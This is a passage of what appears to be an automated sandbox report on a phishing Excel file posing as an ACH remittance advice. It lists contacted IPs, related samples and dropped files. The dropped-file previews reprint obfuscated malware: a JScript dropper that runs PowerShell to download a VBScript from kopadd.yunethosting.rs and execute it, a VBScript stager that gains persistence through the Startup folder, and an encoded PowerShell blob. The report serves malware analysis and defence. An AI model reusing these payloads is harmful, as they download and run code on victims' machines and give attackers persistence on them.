          http://www.piriform.com/ccleanerpowershell.exe, 00000003.00000002.921752019.0000000000409000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921723586.00000000003EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943018679.0000000000451000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943095970.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://kopadd.yunethosting.rs/spowershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.entrust.net0Dpowershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://secure.comodo.com/CPS0powershell.exe, 00000003.00000002.922297732.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921776971.0000000000434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.963668157.00000000003DE000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://crl.entrust.net/2048ca.crl0powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                209.127.20.13
                		unknownCanada
                		55286SERVER-MANIACAfalse
                194.247.196.66
                		kopadd.yunethosting.rsSerbia
                		8771YUNET-ASRSfalse

                General Information

                Joe Sandbox Version:35.0.0 Citrine
                Analysis ID:690542
                Start date and time:2022-08-26 00:12:07 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 34s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:ACH Remittance Advice_CITI25822.xls
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal80.expl.evad.winXLS@20/31@4/2
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 2
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Adjust boot time
                • Enable AMSI
                • Changed system and user locale, location and keyboard layout to English - United States
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 23.205.181.161, 152.199.19.161
                • Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, ie9comview.vo.msecnd.net, go.microsoft.com.edgekey.net, r20swj13mr.microsoft.com, cs9.wpc.v0cdn.net
                • Execution Graph export aborted for target powershell.exe, PID 1496 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                00:12:21API Interceptor387x Sleep call for process: wscript.exe modified
                00:12:23API Interceptor175x Sleep call for process: powershell.exe modified
                00:12:40AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                209.127.20.13Payment Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13/kiss.jpg
                Payment Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13/sinus.vbs
                Remittance_Advice_BofA.xlsGet hashmaliciousBrowse
                • 209.127.20.13/maxine.vbs
                Remittance_Advice_BofA.xlsGet hashmaliciousBrowse
                • 209.127.20.13/maxine.vbs
                BofA_Remittance_Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13/maxine.vbs
                BofA_Remittance_Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13/maxine.vbs
                194.247.196.66IhreRechnung 2022.10.06_1228.xlsGet hashmaliciousBrowse
                • tvstv.yunethosting.rs/nesciuntquos/2SlrSdLBAv7/
                ND255492584111901FBT.xlsGet hashmaliciousBrowse
                • tvstv.yunethosting.rs/nesciuntquos/2SlrSdLBAv7/

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                google.comElectronic Payment.xlsGet hashmaliciousBrowse
                • 142.250.184.78
                Delivery Report.exeGet hashmaliciousBrowse
                • 142.251.209.4
                PO.3123671BKER.exeGet hashmaliciousBrowse
                • 142.251.209.4
                NEW ORDER.exeGet hashmaliciousBrowse
                • 142.250.185.110

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                YUNET-ASRSmzweV0RLB6Get hashmaliciousBrowse
                • 78.30.162.14
                ZP8D67pACl.dllGet hashmaliciousBrowse
                • 78.30.182.32
                mips-20220704-2102Get hashmaliciousBrowse
                • 213.240.13.231
                irc.mips.virGet hashmaliciousBrowse
                • 213.240.61.151
                IhreRechnung 2022.10.06_1228.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                ND255492584111901FBT.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                sora.armGet hashmaliciousBrowse
                • 78.30.137.25
                mipsel-20220501-2200Get hashmaliciousBrowse
                • 78.30.137.26
                tpDZr6B26WGet hashmaliciousBrowse
                • 213.240.13.205
                1isequal9.armGet hashmaliciousBrowse
                • 78.30.149.58
                KPT46qUKYKGet hashmaliciousBrowse
                • 78.30.137.19
                UvGeBNTPpT.exeGet hashmaliciousBrowse
                • 213.198.227.57
                LMXddC0J4BGet hashmaliciousBrowse
                • 78.30.162.16
                ShxmSBgPmyGet hashmaliciousBrowse
                • 78.30.162.19
                mipsGet hashmaliciousBrowse
                • 213.198.255.227
                MJ5yMxtK4YGet hashmaliciousBrowse
                • 213.240.13.204
                SERVER-MANIACAg19BbP45B6.exeGet hashmaliciousBrowse
                • 104.144.69.144
                M8Thb7xyVE.exeGet hashmaliciousBrowse
                • 104.144.69.144
                U1L5RGFKZX.exeGet hashmaliciousBrowse
                • 104.144.69.144
                884817d19480f02d2f427a77afb8ebae0054d09969cfd.exeGet hashmaliciousBrowse
                • 198.20.177.159
                APPLICATION TRANSFER TO ABROAD.scr.exeGet hashmaliciousBrowse
                • 198.20.177.159
                SecuriteInfo.com.Trojan.Win32.Agent.oas1.1238.exeGet hashmaliciousBrowse
                • 23.254.119.4
                SecuriteInfo.com.Trojan.Win32.Agent.oas1.9625.exeGet hashmaliciousBrowse
                • 23.254.119.4
                SecuriteInfo.com.generic.ml.28136.exeGet hashmaliciousBrowse
                • 23.254.119.4
                mzweV0RLB6Get hashmaliciousBrowse
                • 172.245.6.126
                mELrzl6VZkGet hashmaliciousBrowse
                • 104.144.69.41
                mEADpMWrZLGet hashmaliciousBrowse
                • 104.227.93.182
                Payment Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                Payment Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                SecuriteInfo.com.generic.ml.16906.exeGet hashmaliciousBrowse
                • 23.254.119.4
                Remittance_Advice_BofA.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                Remittance_Advice_BofA.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                BofA_Remittance_Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                BofA_Remittance_Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                i586-20220816-1117Get hashmaliciousBrowse
                • 23.250.58.211
                Secpralpro Order Q3 FTD52535345675 .vbsGet hashmaliciousBrowse
                • 23.229.34.139

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                05af1f5ca1b87cc9cc9b25185115607dElectronic Payment.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                EFT Payment Remittance.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                MV_GRACE-Tuticorin-EPDA for AUGUST 22 (STATEMENT)_10.docxGet hashmaliciousBrowse
                • 194.247.196.66
                EFT Payment Remittance.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                Remittance Advice.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                REVISED ORDER GEOTINDO 082022.docxGet hashmaliciousBrowse
                • 194.247.196.66
                EFT Payment Remittance.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                Payment Copy.docxGet hashmaliciousBrowse
                • 194.247.196.66
                POXAUGUST.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Microsoft_Excel_97-2003_Worksheet3.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                q.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Shipping Docs.docxGet hashmaliciousBrowse
                • 194.247.196.66
                QUOTE # EM067022_10.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Payment Advice.docxGet hashmaliciousBrowse
                • 194.247.196.66
                nIRkAjHjX5.docxGet hashmaliciousBrowse
                • 194.247.196.66
                EM N#U00b0A0277527.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Bank Letter.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Foxconn PO935-082322.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Purchase Order No.11724570.docxGet hashmaliciousBrowse
                • 194.247.196.66
                z7YfRvH6Tn.docxGet hashmaliciousBrowse
                • 194.247.196.66

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{70A1164A-250E-11ED-A620-ECF4BBB5915B}.dat

                Download File
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):5120
                Entropy (8bit):1.9275384817389136
                Encrypted:false
                SSDEEP:24:ruYGW/sNRG//sNrj+NqMJ+N1NlWItxvh:rlGWU/G/U1j+09ic
                MD5:A426EF4404E31DB042D71B5369D061E5
                SHA1:7D0C37B9E8EE57DB1781575159A2576795D3CFC3
                SHA-256:BD50763822DEF32225157B7B3A0323019266D70207D83784D8F1C97791EBEA3A
                SHA-512:9E9FB324CCCB9FB24A8250CDCF294C12B8EA7809F0E0CCFB32B781CEA87D52352139AD3FA1E5721C05452C69373CCA570373BAC6D621C9FEA12741E683EB660E
                Malicious:false
                Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................7..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.S.x.a.h.c.A.4.l.7.R.G.m.I.O.z.0.u.7.W.R.W.w.=.=.........:.......................................

                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{70A1164C-250E-11ED-A620-ECF4BBB5915B}.dat

                Download File
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):1.743789820509013
                Encrypted:false
                SSDEEP:12:rlxAFCrEgmfS7KFcxrEgmfUB7qjNlaat5b6yU9D8LY:rVGcxGNNlVeyUB
                MD5:0D134A9EE698138395FC5D9DE3295FEF
                SHA1:A2550CB9C8EB47115C2E65A507F5ADF938649A1D
                SHA-256:1662CFCCD5D0DE79F4D43FF240A150C2139F3C390B1775CA1447E552A7E0E936
                SHA-512:54EFC7DEF5C2D06CA96DD64F569149CDCD486E77E9D37C7D09CC5CC43937D4C1F79C99F03F98F34EC204E0586683D5F7B9F0CA0A6A13FC499A3C74818002B19D
                Malicious:false
                Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................~.6..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\lr5drzg\imagestore.dat

                Download File
                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):31220
                Entropy (8bit):5.683956103084617
                Encrypted:false
                SSDEEP:384:nfFLlWD0KZIndnXmkoA4arnP/bGADEVRTHZUA7hlrNemjwyBhnzLBXP1ss:n9Ls4qQXvqarnP/bV47HNdHLnzl1ss
                MD5:A5260A2E6D406B433000AF10EEB2FDB6
                SHA1:D6A9F0BF1F83751E4D2D90C46B6242EC4DAA3519
                SHA-256:87C2FD333F33EC82B0ADE246EB99E72A4F5AACA9FD6FBE1AC15579F55803F0D4
                SHA-512:45EDBC741178173E3DCCBCF93EE9164010D7FE8C255B771D0360A4D9AE5803B4C6AA22CEC89831015047EE24EDF8482B7075DD5EEC2597CD9BA53758B1863FC7
                Malicious:false
                Preview:........ .h.t.t.p.:././.2.0.9...1.2.7...2.0...1.3./.f.a.v.i.c.o.n...i.c.o.>B........@@.... .(B......(...@......... ......B..............................u..HCp..Ao..6k..%a..6k..9n..8n..7n..7o..6o..6o..6o..6o..6o..6o..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6o..6o..6o..6o..6o..7o..7n..7n..8n..:m..3i..0h..Cq..Is..b..`....................`...%\...W...V...Z...]...^..._...a...a...b...b...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...b...b...b...`...`...^...]...[...V...U...X..Mt....C........[....P...T...[..._...a...c...d...f...h...h...h...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...h...h...g...f...e...c...a..._...\...W...M..Lu.....o...,a...R...[...^...b...d...g...h...j...k...l...l...m...m...m...m...m...m...n...n...n...n..

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\urlblockindex[1].bin

                Download File
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):16
                Entropy (8bit):1.6216407621868583
                Encrypted:false
                SSDEEP:3:PF/l:
                MD5:FA518E3DFAE8CA3A0E495460FD60C791
                SHA1:E4F30E49120657D37267C0162FD4A08934800C69
                SHA-256:775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
                SHA-512:D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
                Malicious:false
                Preview:.p.J2...........

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[2].ico

                Download File
                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                File Type:MS Windows icon resource - 3 icons, 64x64, 32 bits/pixel, 48x48, 32 bits/pixel
                Category:dropped
                Size (bytes):30894
                Entropy (8bit):5.673553664350648
                Encrypted:false
                SSDEEP:384:BfFLlWD0KZIndnXmkoA4arnP/bGADEsTHZUA7hlrNemjwyinzLBXP1s3:B9Ls4qQXvqarnP/bV4iHNdHinzl1s3
                MD5:6EB4A43CB64C97F76562AF703893C8FD
                SHA1:C50C4273B9D2433C6069454F971ED6653E07C126
                SHA-256:1D7C95C5EEA00A8083A95810F902682F9E26E7FBB7876B022A403642D776D0C9
                SHA-512:3BAE9380D8F0D45617ECF9D0D43818B7F8F83B61ECBD5E6DBD189C19D5853F92AA47965AD257CF712E49C03652F129DCA47E8A8DBD86D62E614ACC99EA931181
                Malicious:false
                Preview:......@@.... .(B..6...00.... ..%..^B.. .... ......h..(...@......... ......B..............................u..HCp..Ao..6k..%a..6k..9n..8n..7n..7o..6o..6o..6o..6o..6o..6o..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6p..6o..6o..6o..6o..6o..7o..7n..7n..8n..:m..3i..0h..Cq..Is..b..`....................`...%\...W...V...Z...]...^..._...a...a...b...b...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...b...b...b...`...`...^...]...[...V...U...X..Mt....C........[....P...T...[..._...a...c...d...f...h...h...h...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...h...h...g...f...e...c...a..._...\...W...M..Lu.....o...,a...R...[...^...b...d...g...h...j...k...l...l...m...m...m...m...m...m...n...n...n...n...n...n...n...n...n...n...n...n...n...n...n...n

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\firm[1].txt

                Download File
                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                File Type:ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):4816
                Entropy (8bit):1.7456113877131143
                Encrypted:false
                SSDEEP:48:OBn6zALDCn/r4vGXKQuT4vGX1ebB7xxg8PzUPeSP3n5ZWibrE7xxpsGyN5nVJA7v:OB6zVnUujruYlxunExLAexb2aPdKe
                MD5:CD8CA76327C342972E95387B26538E45
                SHA1:7E4267DCC1CC342D8EDA436DC33FCC9D64C6E71C
                SHA-256:B042FBAAFC13E1DCC0D83D89229678D59884D3682FD814550F8FE68527538BD7
                SHA-512:638B689EE18080B097C8F54C7613C91F6E89D42B0A92EF02084561183640983F3D5825C589AEBCDCB5BFC82B60AFDCE9169CEFC2A0865BA3A6EF48B7C644C278
                Malicious:false
                Preview:$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54DEAA89.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):10108
                Entropy (8bit):3.370687020602186
                Encrypted:false
                SSDEEP:48:l3okLZ89ciY4XyY7ItVxwk+LRWlTa6R27k3jE0SfEJT/tx:NXa9q4Xb7I5Wn2A0xx
                MD5:4483F0091A0060BAD1008957AC7F7472
                SHA1:A09A7A5ECE4EB6512FFFE3E3B04C9329517E623F
                SHA-256:51E4F3327391C5B286E13BA09E80C5AD9412D93169B9B55BFB4B84AE9A41276F
                SHA-512:9CCE22C8B1FE896D142D39FFD9885E34AC08BDE6A2B5F01CA6503733719C220F03D2ADFE65EFBEED4352B4C313A77D0D2D5426B9A4228FFB3F053DDCD7F32EA5
                Malicious:false
                Preview:....l...........Y...I...........Y...2... EMF....|'..........................8...5..................................................d...R...R...p...................................S.e.g.o.e. .U.I....................................................v.4^v........4.Ud.........4^v4.Ude.\.R.o.o.t.\.O.................4.Ud\2..W.it........4.Ud.........3....it.....h.v..]v..it........0.itx3...3..D.Yw 3..j.jt....@.jt.0Zw.2...U.......3...wPwl3.......U..l3.......3....Xwx3....Xw.....2.. .../....{...Z.@>..A.V3Fdv......%...................................r....$..........I.../...........0...0..................?...........?................l...4........$..0...0...(...0...0..... ......$......................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7FAA8.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):10108
                Entropy (8bit):3.370687020602186
                Encrypted:false
                SSDEEP:48:l3okLZ89ciY4XyY7ItVxwk+LRWlTa6R27k3jE0SfEJT/tx:NXa9q4Xb7I5Wn2A0xx
                MD5:4483F0091A0060BAD1008957AC7F7472
                SHA1:A09A7A5ECE4EB6512FFFE3E3B04C9329517E623F
                SHA-256:51E4F3327391C5B286E13BA09E80C5AD9412D93169B9B55BFB4B84AE9A41276F
                SHA-512:9CCE22C8B1FE896D142D39FFD9885E34AC08BDE6A2B5F01CA6503733719C220F03D2ADFE65EFBEED4352B4C313A77D0D2D5426B9A4228FFB3F053DDCD7F32EA5
                Malicious:false
                Preview:....l...........Y...I...........Y...2... EMF....|'..........................8...5..................................................d...R...R...p...................................S.e.g.o.e. .U.I....................................................v.4^v........4.Ud.........4^v4.Ude.\.R.o.o.t.\.O.................4.Ud\2..W.it........4.Ud.........3....it.....h.v..]v..it........0.itx3...3..D.Yw 3..j.jt....@.jt.0Zw.2...U.......3...wPwl3.......U..l3.......3....Xwx3....Xw.....2.. .../....{...Z.@>..A.V3Fdv......%...................................r....$..........I.../...........0...0..................?...........?................l...4........$..0...0...(...0...0..... ......$......................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\qwe.vbs

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2496
                Entropy (8bit):5.597323322816649
                Encrypted:false
                SSDEEP:48:FHzvuAKlMzIZ4hocLiFAU/cCdh4lMY5J9le13Y0qIe/Iznp:FHSAKlM8ZpcWFAW76lMWcC0qIsIznp
                MD5:7092568E9CF03F175C5602BF89E19FB8
                SHA1:8EB83AD1D62BCF98242BDBE1B69BA43C5F289570
                SHA-256:BEEA2E6F3382520530CB34B3870AB0C43D8C2F8A03156EA1B76FECCA78DCFC1D
                SHA-512:93A4B71B3CEA876FF90D53F9D96CBB3E5683401D50116156F16B4320ADF23970445FE9260817D9B0B23D46935E22C7C1536B6EE672E49075F170415DF5CE8532
                Malicious:true
                Preview:....FwLRtmpy=WGJH()........Private Function KdyH(str)..HknBVqN = ""..TTRZ="Mi" + "d(st" + "r,i,1)"..For i=2-1 to Eval(elfjje()).. char = Eval(TTRZ).. if(char<>" ") then.. HknBVqN = HknBVqN+Mid(str,i,1).. End if..Next..KdyH = HknBVqN..End Function ....Private Function WrJQi(g0fdg44)......Execute(VFAs())......End Function....Jfpnga = Eval(pibL())..afs = Split(Jfpnga,"\")..LWtRVP=Eval(rleVRmM(KdyH("57 53 6 3 72 697 074 2e5 363 72 697 07 44e 616 d65")))......UDWk="C:\Users\" + afs(2) + rleVRmM(KdyH("5c 41 7 07 0446 1746 15c 526f 616 d 696 e6 75 c4 d6 96 3726 f736 f6 674 5c 576 96e 646 f7 77 35 c537 4617 27 4204 d65 6e75 5c 507 26f6 7726 16d73 5c537 4617274 757 05c"))........if Jfpnga = UDWk Then....WrJQi(FwLRtmpy)....Else....WrJQi(FwLRtmpy)....WrJQi("Move-item '" + Jfpnga + LWtRVP + "' -Destination '" + UDWk + LWtRVP + "'")....End if ........Private Function WGJH()..FruYYoB=rleVRmM(GRCX())....On Error Resume Next....Set LmTHr = GetObject(KdyH("N e w:0 002 DF01-00 00-00 00-C000-

                C:\Users\user\AppData\Local\Temp\sfoWQ.txt

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):770
                Entropy (8bit):5.626218682122521
                Encrypted:false
                SSDEEP:24:cAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVrN:cgW2XAQgW5Nbvu0AgN
                MD5:D0AE486EEF636DEEDDFDA9366B5A7D7A
                SHA1:6CC3331D7E8AB3FDEDFCBEBF091EC6A24935B884
                SHA-256:740964B8F21B920E29D0EC54938ED220DEC6BCD150EE98DB88F3F8954969A54C
                SHA-512:89527995165B71768729B0607905D18CDB466C10BCCD924118F7021543107ACF5F6D03A7A0D57AAB27CE03167F12F1E6D1E311407F004A47F5FB15B117EB47FC
                Malicious:false
                Preview:var r = GetObject(emrkdsf())....var y7er00gg="Po"+ "wer" + "sh" + "ell";..var yy=r.ShellExecute(y7er00gg,wmkdflllw(),"","",0);..function emrkdsf()..{.....return "ne" + "w:137096" + "20-C279-11C" + "E-A49E-444" + "55354" + "0000"..}..function wmkdflllw()..{....return " $Erro" + "rActi" + "onPref" + "erence = 'Sile" + "ntlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\\qwe.vbs');" + "remove-item ($env:appdata + '\\sfoWQ.js')";..}..

                C:\Users\user\AppData\Local\Temp\sfoWQ.txt:Zone.Identifier

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:gAWY3n:qY3n
                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                Malicious:false
                Preview:[ZoneTransfer]..ZoneId=3..

                C:\Users\user\AppData\Local\Temp\~DF0B295B9A07C77268.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):28672
                Entropy (8bit):2.961262815451197
                Encrypted:false
                SSDEEP:768:Nfk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJ7e:xk3hOdsylKlgxopeiBNhZFGzE+cL2kd9
                MD5:2158F3BB9A3FAD15ED5A91F4FD26F031
                SHA1:A3C7BE23CC3299FDE6986EAAC440C8756B66220A
                SHA-256:4AAFB3F590AA713E69C35E6BC8EF7FD7900D5C4BB6ECBEE7E7E8A633A49A3515
                SHA-512:CFFD71B316E91EA6E60B0640CD54B71282F958663B0FD60C66C0C4D2B1E2D29282CC7F8620D9F15BA5E9801B3D819EC5EDAA325D5FD9A567B799536D2AC1BDF1
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DF1901983323D5FD5B.TMP

                Download File
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):16384
                Entropy (8bit):0.4551878047595137
                Encrypted:false
                SSDEEP:6:CMtPuxFUFAlkx1vCUGlJ8mX19Xh9XRClccYto8ZXrG:CMtPuxyqwqNn8G37qir
                MD5:102DB45E7445AEFB1DB4EE338B5A8394
                SHA1:A0D7870AFDDDAB66EDCC40675E2E42543BC4A63A
                SHA-256:08438CA4959DF71BD8A61B1B263806A1D1898B6FBCDED5EE2E447CFCCB602C81
                SHA-512:88CEAA087F0781742F0D5799B6A005B341C694A930E9F64978DE5C8D28BD88661DE8C88DB1B95263B96A6951282BD6B692069F9170AC42D92DFD3999399FD46E
                Malicious:false
